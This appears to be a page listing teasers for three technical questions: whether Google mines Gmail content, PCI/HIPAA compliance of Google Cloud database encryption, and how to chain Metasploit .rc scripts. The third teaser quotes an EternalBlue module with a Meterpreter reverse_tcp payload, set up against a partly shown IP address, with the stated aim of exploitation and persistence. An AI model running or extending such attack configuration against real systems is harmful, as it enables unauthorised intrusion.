Is Google mining the content of emails I send to people who use gmail? Could they?

If I sign up for Gmail I probably agree to give Google the right to use all my content for whatever purposes they want. We know they have incredible research going on into data mining and machine learning to identify and predict sensitive … Continue reading Is Google mining the content of emails I send to people who use gmail? Could they?

Is Google Cloud Database encryption with customer specified keys PCI and / or HIPAA compliant?

Amateur Question… We’ve written a SaaS application that runs in Google Cloud on a GCP-managed MySQL database. We now need to make our application PCI and / or HIPAA compliant. I know we need to specify our own encryption key and keep it … Continue reading Is Google Cloud Database encryption with customer specified keys PCI and / or HIPAA compliant?

How do you place sequential metasploit rc scripts into a standard linux script [closed]

Working on a quick and easy script to exploit a system and establish persistence. To do so I have written 2 .rc scripts
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp<
set rhost 156.156.1…. Continue reading How do you place sequential metasploit rc scripts into a standard linux script [closed]